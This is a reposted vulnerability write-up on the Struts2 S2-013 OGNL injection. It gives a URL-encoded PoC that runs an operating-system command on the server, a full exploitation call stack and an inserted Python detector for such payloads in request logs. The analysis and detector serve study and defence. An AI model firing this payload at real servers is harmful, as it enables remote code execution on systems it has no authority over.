Struts2 013 vulnerability analysis

0x00 Preface

Following the parameter-name and parameter-value vulnerabilities, this one is related to includeParams.

0x01 Environment

Again using vulhub.

PoC:

HelloWorld.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

0x02 Main text

First, the analysis:

In Struts2, if includeParams equals "all", the GET and POST parameters are included in the generated URL. If an original parameter carries an OGNL expression, that expression is parsed once more during URL construction, and that is what causes this vulnerability.

This is the place where translateVariables iterates over the string and evaluates the variables.

If you think about how one would find this vulnerability: coming in from doEndTag, if the tag is a URL it goes through struts2-core-2.2.3.jar!\org\apache\struts2\components\URL.class, and after that there are no further branches.
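The following is an added example, not code from this post or from Struts. It is a small request-log checker that decodes a query string the way the container would and reports every parameter value that contains a `${...}` or `%{...}` expression, which is what TextParseUtil.translateVariables scans for before handing the content to the value stack. The scan is a simplified mirror of that routine (it assumes an expression runs from the opener to the next `}` and ignores the loop-count handling), the host app.invalid is a placeholder, and SAMPLE_URL is constructed; PAGE_POC_URL is the PoC from this post with that placeholder host prepended.

```python
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Delimiters that TextParseUtil.translateVariables treats as the start of an
# embedded OGNL expression; the expression runs to the next '}'.
# This is a simplified mirror of that scan (assumption), not the Struts code.
OGNL_OPENERS = ("${", "%{")


def find_ognl_expressions(value: str) -> List[str]:
    """Return every ${...} / %{...} expression embedded in one parameter value."""
    found: List[str] = []
    pos = 0
    while True:
        # Locate the earliest opener at or after pos.
        starts = [value.find(o, pos) for o in OGNL_OPENERS]
        starts = [s for s in starts if s != -1]
        if not starts:
            return found
        start = min(starts)
        end = value.find("}", start)
        if end == -1:
            return found  # unterminated opener: nothing would be evaluated
        found.append(value[start:end + 1])
        pos = end + 1


def scan_request_url(url: str) -> Dict[str, List[str]]:
    """Decode the query string as the container would and report each
    parameter whose decoded value contains an OGNL expression."""
    hits: Dict[str, List[str]] = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        exprs = find_ognl_expressions(value)
        if exprs:
            hits.setdefault(name, []).extend(exprs)
    return hits


# Constructed sample: one benign parameter and two that carry expressions.
SAMPLE_URL = "http://app.invalid/HelloWorld.action?a=hello&b=%24%7B1%2B1%7D&c=%25%7Bfoo%7D"

# The PoC from this post, copied verbatim, with a placeholder host prepended.
PAGE_POC_URL = (
    "http://app.invalid/HelloWorld.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C"
    "%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2C"
    "%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C"
    "%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C"
    "%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C"
    "%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D"
)

if __name__ == "__main__":
    for url in (SAMPLE_URL, PAGE_POC_URL):
        for name, exprs in scan_request_url(url).items():
            print(f"{name}: {exprs}")
```

Run against an access log, this flags the requests whose parameter values would be re-evaluated by a page that renders `<s:url>` or `<s:a>` with includeParams="all". The mitigation on the application side is to set includeParams="none" (or upgrade to a fixed Struts release), since the call stack below shows that the evaluation happens purely inside URL construction (UrlHelper.buildParametersString to translateAndEncode to TextParseUtil.translateVariables), not during parameter binding.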
Full call stack:

exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeMethod:871, OgnlRuntime (ognl)
callAppropriateMethod:1273, OgnlRuntime (ognl)
callMethod:68, ObjectMethodAccessor (ognl)
callMethodWithDebugInfo:117, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:108, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:1349, OgnlRuntime (ognl)
getValueBody:90, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:52, ASTAssign (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:63, ASTSequence (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:494, Ognl (ognl)
getValue:217, OgnlUtil (com.opensymphony.xwork2.ognl)
getValue:342, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:331, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:307, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:293, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:350, OgnlValueStack (com.opensymphony.xwork2.ognl)
translateVariables:196, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:129, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:51, TextParseUtil (com.opensymphony.xwork2.util)
translateVariable:288, UrlHelper (org.apache.struts2.views.util)
translateAndEncode:263, UrlHelper (org.apache.struts2.views.util)
buildParameterSubstring:250, UrlHelper (org.apache.struts2.views.util)
buildParametersString:229, UrlHelper (org.apache.struts2.views.util)
buildParametersString:194, UrlHelper (org.apache.struts2.views.util)
buildUrl:172, UrlHelper (org.apache.struts2.views.util)
determineActionURL:410, Component (org.apache.struts2.components)
determineActionURL:68, ComponentUrlProvider (org.apache.struts2.components)
renderUrl:74, ServletUrlRenderer (org.apache.struts2.components)
end:149, URL (org.apache.struts2.components)
doEndTag:42, ComponentTagSupport (org.apache.struts2.views.jsp)
_jspx_meth_s_005furl_005f0:15, index_jsp (org.apache.jsp)
_jspService:15, index_jsp (org.apache.jsp)
service:70, HttpJspBase (org.apache.jasper.runtime)
service:723, HttpServlet (javax.servlet.http)
service:388, JspServletWrapper (org.apache.jasper.servlet)
serviceJspFile:321, JspServlet (org.apache.jasper.servlet)
service:267, JspServlet (org.apache.jasper.servlet)
service:723, HttpServlet (javax.servlet.http)
internalDoFilter:290, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:646, ApplicationDispatcher (org.apache.catalina.core)
processRequest:436, ApplicationDispatcher (org.apache.catalina.core)
doForward:374, ApplicationDispatcher (org.apache.catalina.core)
forward:302, ApplicationDispatcher (org.apache.catalina.core)
doExecute:157, ServletDispatcherResult (org.apache.struts2.dispatcher)
execute:186, StrutsResultSupport (org.apache.struts2.dispatcher)
executeResult:373, DefaultActionInvocation (com.opensymphony.xwork2)
invoke:277, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:176, DefaultWorkflowInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:263, ValidationInterceptor (com.opensymphony.xwork2.validator)
doIntercept:68, AnnotationValidationInterceptor (org.apache.struts2.interceptor.validation)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:133, ConversionErrorInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, StaticParametersInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:75, MultiselectInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:94, CheckboxInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:243, FileUploadInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:100, ModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:141, ScopedModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:270, DebuggingInterceptor (org.apache.struts2.interceptor.debugging)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:145, ChainingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:171, PrepareInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:176, I18nInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:164, ServletConfigInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, AliasInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:187, ExceptionMappingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
execute:52, StrutsActionProxy (org.apache.struts2.impl)
serviceAction:498, Dispatcher (org.apache.struts2.dispatcher)
doFilter:434, FilterDispatcher (org.apache.struts2.dispatcher)
internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:233, StandardWrapperValve (org.apache.catalina.core)
invoke:191, StandardContextValve (org.apache.catalina.core)
invoke:127, StandardHostValve (org.apache.catalina.core)
invoke:103, ErrorReportValve (org.apache.catalina.valves)
invoke:109, StandardEngineValve (org.apache.catalina.core)
service:293, CoyoteAdapter (org.apache.catalina.connector)
process:859, Http11Processor (org.apache.coyote.http11)
process:610, Http11Protocol$Http11ConnectionHandler (org.apache.coyote.http11)
run:503, JIoEndpoint$Worker (org.apache.tomcat.util.net)
run:748, Thread (java.lang)

That's all.


Reposted from blog.csdn.net/qq_36869808/article/details/130958568